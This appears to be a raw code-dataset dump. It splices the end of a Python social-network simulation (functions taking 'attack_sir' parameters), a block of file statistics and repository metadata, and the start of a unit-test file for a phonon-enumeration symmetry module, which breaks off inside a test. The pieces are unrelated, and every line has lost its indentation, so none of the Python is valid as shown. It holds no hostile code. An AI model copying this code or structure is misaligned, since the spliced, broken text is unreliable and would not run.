G = initial_friend_SC(G, 'human', i, dname)
print('STC:')
print('Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
G = interaction_SC(G, dname, likers, 'STC', p_as, i, attack_sir, attack_state, attack_report, feat)
capital = post_process(G, capital, i, 'STC', dname, out)
def CC(sample, capital_full, G_full, likers, p_as, i, attack_sir, attack_state, attack_report, dname, out, feat=2):
capital = capital_full.loc[sorted(sample)]
G = nx.Graph(G_full.subgraph(sorted(sample)))
print('CC:')
G = initial_friend_SC(G, 'cognitive', i, dname)
print('CC:')
print('Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
G = interaction_SC(G, dname, likers, 'CC', p_as, i, attack_sir, attack_state, attack_report, feat)
capital = post_process(G, capital, i, 'CC', dname, out)
def SC(sample, capital_full, G_full, likers, p_as, i, attack_sir, attack_state, attack_report, dname, out, feat=3):
capital = capital_full.loc[sorted(sample)]
G = nx.Graph(G_full.subgraph(sorted(sample)))
print('SC:')
G = initial_friend_SC(G, 'capital', i, dname)
print('SC:')
print('Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
G = interaction_SC(G, dname, likers, 'SC', p_as, i, attack_sir, attack_state, attack_report, feat)
capital = post_process(G, capital, i, 'SC', dname, out)
def SA(sample, capital_full, G_full, likers, p_as, i, attack_sir, attack_state, attack_report, dname, out, feat=5):
capital = capital_full.loc[sorted(sample)]
G = nx.Graph(G_full.subgraph(sorted(sample)))
print('SA:')
G = initial_friend_SA(G, i, dname)
print('SA:')
print('Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
G = interaction_SA(G, dname, likers, p_as, i, attack_sir, attack_state, attack_report, feat)
capital = post_process(G, capital, i, 'SA', dname, out)
def TR(sample, capital_full, G_full, likers, p_as, i, attack_sir, attack_state, attack_report, dname, out, feat=4):
capital = capital_full.loc[sorted(sample)]
G = nx.Graph(G_full.subgraph(sorted(sample)))
print('TR:')
G = initial_friend_TR(G, i, dname)
print('TR:')
print('Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
G = interaction_TR(G, dname, likers, 'TR', p_as, i, attack_sir, attack_state, attack_report, feat)
capital = post_process(G, capital, i, 'TR', dname, out)
def TP(sample, capital_full, G_full, likers, topics, p_as, i, attack_sir, attack_state, attack_report, dname, out, feat=6):
capital = capital_full.loc[sorted(sample)]
G = nx.Graph(G_full.subgraph(sorted(sample)))
print('TP:')
G = initial_friend_TP(G, topics, i, dname)
print('TP:')
print('Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
G = interaction_TP(G, dname, likers, topics, p_as, i, attack_sir, attack_state, attack_report, feat)
capital = post_process(G, capital, i, 'TP', dname, out)
| 45.414154
| 138
| 0.496978
| 9,592
| 73,798
| 3.731443
| 0.05661
| 0.069904
| 0.029727
| 0.024139
| 0.84083
| 0.82552
| 0.803476
| 0.775117
| 0.764752
| 0.748407
| 0
| 0.018746
| 0.352327
| 73,798
| 1,624
| 139
| 45.442118
| 0.730088
| 0.093959
| 0
| 0.779289
| 0
| 0
| 0.075727
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024943
| false
| 0.001512
| 0.011338
| 0
| 0.049131
| 0.044596
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
962e4c13327d77744cab176407f57445ea332012
| 69,150
|
py
|
Python
|
tests/test_symmetry.py
|
wsmorgan/phonon-enumeration
|
5d7a8d8e3403cc387bdd58cf98a23e4751ea34dd
|
[
"MIT-0"
] | 5
|
2016-06-17T05:39:27.000Z
|
2021-05-30T21:02:08.000Z
|
tests/test_symmetry.py
|
wsmorgan/phonon-enumeration
|
5d7a8d8e3403cc387bdd58cf98a23e4751ea34dd
|
[
"MIT-0"
] | 66
|
2016-04-02T05:02:08.000Z
|
2018-07-05T19:43:09.000Z
|
tests/test_symmetry.py
|
wsmorgan/phonon-enumeration
|
5d7a8d8e3403cc387bdd58cf98a23e4751ea34dd
|
[
"MIT-0"
] | 5
|
2017-03-15T21:28:44.000Z
|
2020-01-09T14:44:45.000Z
|
"""Methods for testing the subroutines in the symmetry module."""
import unittest as ut
import numpy as np
gpath = "tests/symmetry/"
def _read_pg(fname):
pg = []
array = []
with open(fname,"r") as f:
for line in f:
temp = line.strip().split()
if len(temp)==3:
array.append([float(i) for i in temp])
else:
pg.append(array)
array = []
return pg
def _read_float_3D(fname):
array = []
parray = []
lc = 0
dc = 0
with open(fname,"r") as f1:
for line in f1:
lc +=1
if lc == 2:
d1 = int(line.strip().split()[1])
d2 = int(line.strip().split()[2])
d3 = int(line.strip().split()[3])
elif lc > 3:
if "#" not in line:
dc +=1
parray.append([float(i) for i in line.strip().split()])
if dc == 3:
array.append(list(map(list,zip(*parray))))
parray = []
dc = 0
array2 = []
for i in range(d3):
array2.append(list(map(list,zip(*[array[0][i],array[1][i],array[2][i]]))))
return array2
def _read_float_2D(fname):
array = []
with open(fname,"r") as f1:
for line in f1:
if "#" not in line:
array.append([float(i) for i in line.strip().split()])
return array
def _read_float_1D(fname):
array = []
with open(fname,"r") as f1:
for line in f1:
if "#" not in line:
array = [float(i) for i in line.strip().split()]
return array
def _read_int_1D(fname):
array = []
with open(fname,"r") as f1:
for line in f1:
if "#" not in line:
array = [int(i) for i in line.strip().split()]
return array
def _read_int(fname):
with open(fname,"r") as f1:
line = f1.readline()
if "#" in line:
line = f1.readline()
val = int(line.strip())
return val
def _read_float(fname):
with open(fname,"r") as f1:
line = f1.readline()
if "#" in line:
line = f1.readline()
val = float(line.strip())
return val
def _read_logical(fname):
with open(fname,"r") as f1:
line = f1.readline()
if "#" in line:
line = f1.readline()
if "t" in line.lower():
val = True
else:
val = False
return val
def _read_output(test):
values = []
with open("tests/symmetry/"+test) as f:
for line in f:
values.append(eval(line))
return values
def _read_spaceGroup(case):
sg_ops = _read_float_3D(gpath+"get_spaceGroup_sg_op.out."+str(case))
sg_fracts = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_sg_fract.out."+str(case)))))
return [sg_ops,sg_fracts]
class TestGetConcsForSize(ut.TestCase):
"""Tests of the get_concs_for_size subroutine."""
def test_1(self):
from phenum.symmetry import get_concs_for_size
size = 4
nspecies = 2
nB = 3
res_concs = True
concs = [[1, 1, 4], [1, 1, 4]]
out = []
self.assertEqual(get_concs_for_size(size,nspecies,res_concs,nB,concs),out)
def test_2(self):
from phenum.symmetry import get_concs_for_size
size = 15
nspecies = 3
nB = 2
res_concs = True
concs = [[2, 8, 15], [5, 5, 15], [4, 8, 15]]
out = [[4, 10, 16], [5, 10, 15], [6, 10, 14], [7, 10, 13], [8, 10, 12], [9, 10, 11], [10, 10, 10], [11, 10, 9], [12, 10, 8]]
self.assertEqual(get_concs_for_size(size,nspecies,res_concs,nB,concs),out)
def test_3(self):
from phenum.symmetry import get_concs_for_size
size = 18
nspecies = 4
nB = 2
res_concs = True
concs = [[5, 5, 18], [6, 13, 18], [4, 16, 18], [5, 8, 18]]
out = []
self.assertEqual(get_concs_for_size(size,nspecies,res_concs,nB,concs),out)
def test_4(self):
from phenum.symmetry import get_concs_for_size
size = 16
nspecies = 2
nB = 3
res_concs = False
concs = []
out = [[0, 48], [1, 47], [2, 46], [3, 45], [4, 44], [5, 43], [6, 42], [7, 41], [8, 40], [9, 39], [10, 38], [11, 37], [12, 36], [13, 35], [14, 34], [15, 33], [16, 32], [17, 31], [18, 30], [19, 29], [20, 28], [21, 27], [22, 26], [23, 25], [24, 24], [25, 23], [26, 22], [27, 21], [28, 20], [29, 19], [30, 18], [31, 17], [32, 16], [33, 15], [34, 14], [35, 13], [36, 12], [37, 11], [38, 10], [39, 9], [40, 8], [41, 7], [42, 6], [43, 5], [44, 4], [45, 3], [46, 2], [47, 1], [48, 0]]
self.assertEqual(get_concs_for_size(size,nspecies,res_concs,nB,concs),out)
def test_5(self):
from phenum.symmetry import get_concs_for_size
size = 13
nspecies = 3
nB = 2
res_concs = True
concs = [[3, 7, 13], [5, 12, 13], [1, 3, 13]]
out = [[6, 14, 6], [6, 15, 5], [6, 16, 4], [6, 17, 3], [6, 18, 2], [7, 13, 6], [7, 14, 5], [7, 15, 4], [7, 16, 3], [7, 17, 2], [8, 12, 6], [8, 13, 5], [8, 14, 4], [8, 15, 3], [8, 16, 2], [9, 11, 6], [9, 12, 5], [9, 13, 4], [9, 14, 3], [9, 15, 2], [10, 10, 6], [10, 11, 5], [10, 12, 4], [10, 13, 3], [10, 14, 2], [11, 10, 5], [11, 11, 4], [11, 12, 3], [11, 13, 2], [12, 10, 4], [12, 11, 3], [12, 12, 2], [13, 10, 3], [13, 11, 2], [14, 10, 2]]
self.assertEqual(get_concs_for_size(size,nspecies,res_concs,nB,concs),out)
def test_6(self):
from phenum.symmetry import get_concs_for_size
size = 13
nspecies = 4
nB = 3
res_concs = True
concs = [[2, 5, 13], [5, 12, 13], [3, 4, 13], [4, 6, 13]]
out = []
self.assertEqual(get_concs_for_size(size,nspecies,res_concs,nB,concs),out)
def test_7(self):
from phenum.symmetry import get_concs_for_size
size = 16
nspecies = 3
nB = 2
res_concs = False
concs = []
out = [[0, 0, 32], [0, 1, 31], [0, 2, 30], [0, 3, 29], [0, 4, 28], [0, 5, 27], [0, 6, 26], [0, 7, 25], [0, 8, 24], [0, 9, 23], [0, 10, 22], [0, 11, 21], [0, 12, 20], [0, 13, 19], [0, 14, 18], [0, 15, 17], [0, 16, 16], [0, 17, 15], [0, 18, 14], [0, 19, 13], [0, 20, 12], [0, 21, 11], [0, 22, 10], [0, 23, 9], [0, 24, 8], [0, 25, 7], [0, 26, 6], [0, 27, 5], [0, 28, 4], [0, 29, 3], [0, 30, 2], [0, 31, 1], [0, 32, 0], [1, 0, 31], [1, 1, 30], [1, 2, 29], [1, 3, 28], [1, 4, 27], [1, 5, 26], [1, 6, 25], [1, 7, 24], [1, 8, 23], [1, 9, 22], [1, 10, 21], [1, 11, 20], [1, 12, 19], [1, 13, 18], [1, 14, 17], [1, 15, 16], [1, 16, 15], [1, 17, 14], [1, 18, 13], [1, 19, 12], [1, 20, 11], [1, 21, 10], [1, 22, 9], [1, 23, 8], [1, 24, 7], [1, 25, 6], [1, 26, 5], [1, 27, 4], [1, 28, 3], [1, 29, 2], [1, 30, 1], [1, 31, 0], [2, 0, 30], [2, 1, 29], [2, 2, 28], [2, 3, 27], [2, 4, 26], [2, 5, 25], [2, 6, 24], [2, 7, 23], [2, 8, 22], [2, 9, 21], [2, 10, 20], [2, 11, 19], [2, 12, 18], [2, 13, 17], [2, 14, 16], [2, 15, 15], [2, 16, 14], [2, 17, 13], [2, 18, 12], [2, 19, 11], [2, 20, 10], [2, 21, 9], [2, 22, 8], [2, 23, 7], [2, 24, 6], [2, 25, 5], [2, 26, 4], [2, 27, 3], [2, 28, 2], [2, 29, 1], [2, 30, 0], [3, 0, 29], [3, 1, 28], [3, 2, 27], [3, 3, 26], [3, 4, 25], [3, 5, 24], [3, 6, 23], [3, 7, 22], [3, 8, 21], [3, 9, 20], [3, 10, 19], [3, 11, 18], [3, 12, 17], [3, 13, 16], [3, 14, 15], [3, 15, 14], [3, 16, 13], [3, 17, 12], [3, 18, 11], [3, 19, 10], [3, 20, 9], [3, 21, 8], [3, 22, 7], [3, 23, 6], [3, 24, 5], [3, 25, 4], [3, 26, 3], [3, 27, 2], [3, 28, 1], [3, 29, 0], [4, 0, 28], [4, 1, 27], [4, 2, 26], [4, 3, 25], [4, 4, 24], [4, 5, 23], [4, 6, 22], [4, 7, 21], [4, 8, 20], [4, 9, 19], [4, 10, 18], [4, 11, 17], [4, 12, 16], [4, 13, 15], [4, 14, 14], [4, 15, 13], [4, 16, 12], [4, 17, 11], [4, 18, 10], [4, 19, 9], [4, 20, 8], [4, 21, 7], [4, 22, 6], [4, 23, 5], [4, 24, 4], [4, 25, 3], [4, 26, 2], [4, 27, 1], [4, 28, 0], [5, 0, 27], [5, 1, 26], [5, 2, 25], [5, 3, 24], [5, 4, 23], [5, 5, 22], [5, 6, 21], [5, 7, 20], [5, 8, 19], [5, 9, 18], [5, 10, 17], [5, 11, 16], [5, 12, 15], [5, 13, 14], [5, 14, 13], [5, 15, 12], [5, 16, 11], [5, 17, 10], [5, 18, 9], [5, 19, 8], [5, 20, 7], [5, 21, 6], [5, 22, 5], [5, 23, 4], [5, 24, 3], [5, 25, 2], [5, 26, 1], [5, 27, 0], [6, 0, 26], [6, 1, 25], [6, 2, 24], [6, 3, 23], [6, 4, 22], [6, 5, 21], [6, 6, 20], [6, 7, 19], [6, 8, 18], [6, 9, 17], [6, 10, 16], [6, 11, 15], [6, 12, 14], [6, 13, 13], [6, 14, 12], [6, 15, 11], [6, 16, 10], [6, 17, 9], [6, 18, 8], [6, 19, 7], [6, 20, 6], [6, 21, 5], [6, 22, 4], [6, 23, 3], [6, 24, 2], [6, 25, 1], [6, 26, 0], [7, 0, 25], [7, 1, 24], [7, 2, 23], [7, 3, 22], [7, 4, 21], [7, 5, 20], [7, 6, 19], [7, 7, 18], [7, 8, 17], [7, 9, 16], [7, 10, 15], [7, 11, 14], [7, 12, 13], [7, 13, 12], [7, 14, 11], [7, 15, 10], [7, 16, 9], [7, 17, 8], [7, 18, 7], [7, 19, 6], [7, 20, 5], [7, 21, 4], [7, 22, 3], [7, 23, 2], [7, 24, 1], [7, 25, 0], [8, 0, 24], [8, 1, 23], [8, 2, 22], [8, 3, 21], [8, 4, 20], [8, 5, 19], [8, 6, 18], [8, 7, 17], [8, 8, 16], [8, 9, 15], [8, 10, 14], [8, 11, 13], [8, 12, 12], [8, 13, 11], [8, 14, 10], [8, 15, 9], [8, 16, 8], [8, 17, 7], [8, 18, 6], [8, 19, 5], [8, 20, 4], [8, 21, 3], [8, 22, 2], [8, 23, 1], [8, 24, 0], [9, 0, 23], [9, 1, 22], [9, 2, 21], [9, 3, 20], [9, 4, 19], [9, 5, 18], [9, 6, 17], [9, 7, 16], [9, 8, 15], [9, 9, 14], [9, 10, 13], [9, 11, 12], [9, 12, 11], [9, 13, 10], [9, 14, 9], [9, 15, 8], [9, 16, 7], [9, 17, 6], [9, 18, 5], [9, 19, 4], [9, 20, 3], [9, 21, 2], [9, 22, 1], [9, 23, 0], [10, 0, 22], [10, 1, 21], [10, 2, 20], [10, 3, 19], [10, 4, 18], [10, 5, 17], [10, 6, 16], [10, 7, 15], [10, 8, 14], [10, 9, 13], [10, 10, 12], [10, 11, 11], [10, 12, 10], [10, 13, 9], [10, 14, 8], [10, 15, 7], [10, 16, 6], [10, 17, 5], [10, 18, 4], [10, 19, 3], [10, 20, 2], [10, 21, 1], [10, 22, 0], [11, 0, 21], [11, 1, 20], [11, 2, 19], [11, 3, 18], [11, 4, 17], [11, 5, 16], [11, 6, 15], [11, 7, 14], [11, 8, 13], [11, 9, 12], [11, 10, 11], [11, 11, 10], [11, 12, 9], [11, 13, 8], [11, 14, 7], [11, 15, 6], [11, 16, 5], [11, 17, 4], [11, 18, 3], [11, 19, 2], [11, 20, 1], [11, 21, 0], [12, 0, 20], [12, 1, 19], [12, 2, 18], [12, 3, 17], [12, 4, 16], [12, 5, 15], [12, 6, 14], [12, 7, 13], [12, 8, 12], [12, 9, 11], [12, 10, 10], [12, 11, 9], [12, 12, 8], [12, 13, 7], [12, 14, 6], [12, 15, 5], [12, 16, 4], [12, 17, 3], [12, 18, 2], [12, 19, 1], [12, 20, 0], [13, 0, 19], [13, 1, 18], [13, 2, 17], [13, 3, 16], [13, 4, 15], [13, 5, 14], [13, 6, 13], [13, 7, 12], [13, 8, 11], [13, 9, 10], [13, 10, 9], [13, 11, 8], [13, 12, 7], [13, 13, 6], [13, 14, 5], [13, 15, 4], [13, 16, 3], [13, 17, 2], [13, 18, 1], [13, 19, 0], [14, 0, 18], [14, 1, 17], [14, 2, 16], [14, 3, 15], [14, 4, 14], [14, 5, 13], [14, 6, 12], [14, 7, 11], [14, 8, 10], [14, 9, 9], [14, 10, 8], [14, 11, 7], [14, 12, 6], [14, 13, 5], [14, 14, 4], [14, 15, 3], [14, 16, 2], [14, 17, 1], [14, 18, 0], [15, 0, 17], [15, 1, 16], [15, 2, 15], [15, 3, 14], [15, 4, 13], [15, 5, 12], [15, 6, 11], [15, 7, 10], [15, 8, 9], [15, 9, 8], [15, 10, 7], [15, 11, 6], [15, 12, 5], [15, 13, 4], [15, 14, 3], [15, 15, 2], [15, 16, 1], [15, 17, 0], [16, 0, 16], [16, 1, 15], [16, 2, 14], [16, 3, 13], [16, 4, 12], [16, 5, 11], [16, 6, 10], [16, 7, 9], [16, 8, 8], [16, 9, 7], [16, 10, 6], [16, 11, 5], [16, 12, 4], [16, 13, 3], [16, 14, 2], [16, 15, 1], [16, 16, 0], [17, 0, 15], [17, 1, 14], [17, 2, 13], [17, 3, 12], [17, 4, 11], [17, 5, 10], [17, 6, 9], [17, 7, 8], [17, 8, 7], [17, 9, 6], [17, 10, 5], [17, 11, 4], [17, 12, 3], [17, 13, 2], [17, 14, 1], [17, 15, 0], [18, 0, 14], [18, 1, 13], [18, 2, 12], [18, 3, 11], [18, 4, 10], [18, 5, 9], [18, 6, 8], [18, 7, 7], [18, 8, 6], [18, 9, 5], [18, 10, 4], [18, 11, 3], [18, 12, 2], [18, 13, 1], [18, 14, 0], [19, 0, 13], [19, 1, 12], [19, 2, 11], [19, 3, 10], [19, 4, 9], [19, 5, 8], [19, 6, 7], [19, 7, 6], [19, 8, 5], [19, 9, 4], [19, 10, 3], [19, 11, 2], [19, 12, 1], [19, 13, 0], [20, 0, 12], [20, 1, 11], [20, 2, 10], [20, 3, 9], [20, 4, 8], [20, 5, 7], [20, 6, 6], [20, 7, 5], [20, 8, 4], [20, 9, 3], [20, 10, 2], [20, 11, 1], [20, 12, 0], [21, 0, 11], [21, 1, 10], [21, 2, 9], [21, 3, 8], [21, 4, 7], [21, 5, 6], [21, 6, 5], [21, 7, 4], [21, 8, 3], [21, 9, 2], [21, 10, 1], [21, 11, 0], [22, 0, 10], [22, 1, 9], [22, 2, 8], [22, 3, 7], [22, 4, 6], [22, 5, 5], [22, 6, 4], [22, 7, 3], [22, 8, 2], [22, 9, 1], [22, 10, 0], [23, 0, 9], [23, 1, 8], [23, 2, 7], [23, 3, 6], [23, 4, 5], [23, 5, 4], [23, 6, 3], [23, 7, 2], [23, 8, 1], [23, 9, 0], [24, 0, 8], [24, 1, 7], [24, 2, 6], [24, 3, 5], [24, 4, 4], [24, 5, 3], [24, 6, 2], [24, 7, 1], [24, 8, 0], [25, 0, 7], [25, 1, 6], [25, 2, 5], [25, 3, 4], [25, 4, 3], [25, 5, 2], [25, 6, 1], [25, 7, 0], [26, 0, 6], [26, 1, 5], [26, 2, 4], [26, 3, 3], [26, 4, 2], [26, 5, 1], [26, 6, 0], [27, 0, 5], [27, 1, 4], [27, 2, 3], [27, 3, 2], [27, 4, 1], [27, 5, 0], [28, 0, 4], [28, 1, 3], [28, 2, 2], [28, 3, 1], [28, 4, 0], [29, 0, 3], [29, 1, 2], [29, 2, 1], [29, 3, 0], [30, 0, 2], [30, 1, 1], [30, 2, 0], [31, 0, 1], [31, 1, 0], [32, 0, 0]]
self.assertEqual(get_concs_for_size(size,nspecies,res_concs,nB,concs),out)
def test_8(self):
from phenum.symmetry import get_concs_for_size
size = 18
nspecies = 3
nB = 4
res_concs = True
concs = [[3, 7, 18], [1, 8, 18], [6, 7, 18]]
out = [[12, 32, 28], [13, 31, 28], [13, 32, 27], [14, 30, 28], [14, 31, 27], [14, 32, 26], [15, 29, 28], [15, 30, 27], [15, 31, 26], [15, 32, 25], [16, 28, 28], [16, 29, 27], [16, 30, 26], [16, 31, 25], [16, 32, 24], [17, 27, 28], [17, 28, 27], [17, 29, 26], [17, 30, 25], [17, 31, 24], [18, 26, 28], [18, 27, 27], [18, 28, 26], [18, 29, 25], [18, 30, 24], [19, 25, 28], [19, 26, 27], [19, 27, 26], [19, 28, 25], [19, 29, 24], [20, 24, 28], [20, 25, 27], [20, 26, 26], [20, 27, 25], [20, 28, 24], [21, 23, 28], [21, 24, 27], [21, 25, 26], [21, 26, 25], [21, 27, 24], [22, 22, 28], [22, 23, 27], [22, 24, 26], [22, 25, 25], [22, 26, 24], [23, 21, 28], [23, 22, 27], [23, 23, 26], [23, 24, 25], [23, 25, 24], [24, 20, 28], [24, 21, 27], [24, 22, 26], [24, 23, 25], [24, 24, 24], [25, 19, 28], [25, 20, 27], [25, 21, 26], [25, 22, 25], [25, 23, 24], [26, 18, 28], [26, 19, 27], [26, 20, 26], [26, 21, 25], [26, 22, 24], [27, 17, 28], [27, 18, 27], [27, 19, 26], [27, 20, 25], [27, 21, 24], [28, 16, 28], [28, 17, 27], [28, 18, 26], [28, 19, 25], [28, 20, 24]]
self.assertEqual(get_concs_for_size(size,nspecies,res_concs,nB,concs),out)
def test_9(self):
from phenum.symmetry import get_concs_for_size
size = 15
nspecies = 2
nB = 3
res_concs = False
concs = []
out = [[0, 45], [1, 44], [2, 43], [3, 42], [4, 41], [5, 40], [6, 39], [7, 38], [8, 37], [9, 36], [10, 35], [11, 34], [12, 33], [13, 32], [14, 31], [15, 30], [16, 29], [17, 28], [18, 27], [19, 26], [20, 25], [21, 24], [22, 23], [23, 22], [24, 21], [25, 20], [26, 19], [27, 18], [28, 17], [29, 16], [30, 15], [31, 14], [32, 13], [33, 12], [34, 11], [35, 10], [36, 9], [37, 8], [38, 7], [39, 6], [40, 5], [41, 4], [42, 3], [43, 2], [44, 1], [45, 0]]
self.assertEqual(get_concs_for_size(size,nspecies,res_concs,nB,concs),out)
def test_10(self):
from phenum.symmetry import get_concs_for_size
size = 14
nspecies = 2
nB = 4
res_concs = True
concs = [[3, 3, 14], [2, 13, 14]]
out = [[12, 44]]
self.assertEqual(get_concs_for_size(size,nspecies,res_concs,nB,concs),out)
class TestGetSpaceGroup(ut.TestCase):
"""Tests of the get_spaceGroup subroutine."""
def _compare_space_group(self,out1,out2):
ops1 = out1[0]
ops2 = out2[0]
fract1 = out1[1]
fract2 = out2[1]
if len(ops1) == len(ops2):
for i in range(len(ops1)):
for j in range(3):
for k in range(3):
self.assertAlmostEqual(ops1[i][j][k],ops2[i][j][k],places=12)
else:
self.assertEqual(len(ops1),len(ops2))
if len(fract1) == len(fract2):
for i in range(len(ops1)):
for j in range(3):
self.assertAlmostEqual(fract1[i][j],fract2[i][j],places=12)
else:
self.assertEqual(len(fract1),len(fract2))
def test_1(self):
from phenum.symmetry import get_spaceGroup
par_lat = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
atomType = [1]
bas_vecs = [[0.0, 0.0, 0.0]]
eps = 1e-10
lattcoords = False
out = ([[[-1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, -1.0]], [[-1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, 1.0]], [[-1.0, 0.0, 0.0], [0.0, 0.0, -1.0], [0.0, -1.0, 0.0]], [[-1.0, 0.0, 0.0], [0.0, 0.0, -1.0], [0.0, 1.0, 0.0]], [[-1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, -1.0, 0.0]], [[-1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, 1.0, 0.0]], [[-1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, -1.0]], [[-1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]], [[0.0, -1.0, 0.0], [-1.0, 0.0, 0.0], [0.0, 0.0, -1.0]], [[0.0, -1.0, 0.0], [-1.0, 0.0, 0.0], [0.0, 0.0, 1.0]], [[0.0, -1.0, 0.0], [0.0, 0.0, -1.0], [-1.0, 0.0, 0.0]], [[0.0, -1.0, 0.0], [0.0, 0.0, -1.0], [1.0, 0.0, 0.0]], [[0.0, -1.0, 0.0], [0.0, 0.0, 1.0], [-1.0, 0.0, 0.0]], [[0.0, -1.0, 0.0], [0.0, 0.0, 1.0], [1.0, 0.0, 0.0]], [[0.0, -1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, -1.0]], [[0.0, -1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]], [[0.0, 0.0, -1.0], [-1.0, 0.0, 0.0], [0.0, -1.0, 0.0]], [[0.0, 0.0, -1.0], [-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]], [[0.0, 0.0, -1.0], [0.0, -1.0, 0.0], [-1.0, 0.0, 0.0]], [[0.0, 0.0, -1.0], [0.0, -1.0, 0.0], [1.0, 0.0, 0.0]], [[0.0, 0.0, -1.0], [0.0, 1.0, 0.0], [-1.0, 0.0, 0.0]], [[0.0, 0.0, -1.0], [0.0, 1.0, 0.0], [1.0, 0.0, 0.0]], [[0.0, 0.0, -1.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]], [[0.0, 0.0, -1.0], [1.0, 0.0, 0.0], [0.0, 1.0, 0.0]], [[0.0, 0.0, 1.0], [-1.0, 0.0, 0.0], [0.0, -1.0, 0.0]], [[0.0, 0.0, 1.0], [-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]], [[0.0, 0.0, 1.0], [0.0, -1.0, 0.0], [-1.0, 0.0, 0.0]], [[0.0, 0.0, 1.0], [0.0, -1.0, 0.0], [1.0, 0.0, 0.0]], [[0.0, 0.0, 1.0], [0.0, 1.0, 0.0], [-1.0, 0.0, 0.0]], [[0.0, 0.0, 1.0], [0.0, 1.0, 0.0], [1.0, 0.0, 0.0]], [[0.0, 0.0, 1.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]], [[0.0, 0.0, 1.0], [1.0, 0.0, 0.0], [0.0, 1.0, 0.0]], [[0.0, 1.0, 0.0], [-1.0, 0.0, 0.0], [0.0, 0.0, -1.0]], [[0.0, 1.0, 0.0], [-1.0, 0.0, 0.0], [0.0, 0.0, 1.0]], [[0.0, 1.0, 0.0], [0.0, 0.0, -1.0], [-1.0, 0.0, 0.0]], [[0.0, 1.0, 0.0], [0.0, 0.0, -1.0], [1.0, 0.0, 0.0]], [[0.0, 1.0, 0.0], [0.0, 0.0, 1.0], [-1.0, 0.0, 0.0]], [[0.0, 1.0, 0.0], [0.0, 0.0, 1.0], [1.0, 0.0, 0.0]], [[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, -1.0]], [[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]], [[1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, -1.0]], [[1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, 1.0]], [[1.0, 0.0, 0.0], [0.0, 0.0, -1.0], [0.0, -1.0, 0.0]], [[1.0, 0.0, 0.0], [0.0, 0.0, -1.0], [0.0, 1.0, 0.0]], [[1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, -1.0, 0.0]], [[1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, 1.0, 0.0]], [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, -1.0]], [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]], [[0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
self.assertEqual(get_spaceGroup(par_lat,atomType,bas_vecs,eps,lattcoords),out)
def test_5(self):
from phenum.symmetry import get_spaceGroup
par_lat = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
atomType = [1, 1]
bas_vecs = [[0.0, 0.0, 0.0], [0.25, 0.25, 0.75]]
eps = 1e-10
lattcoords = False
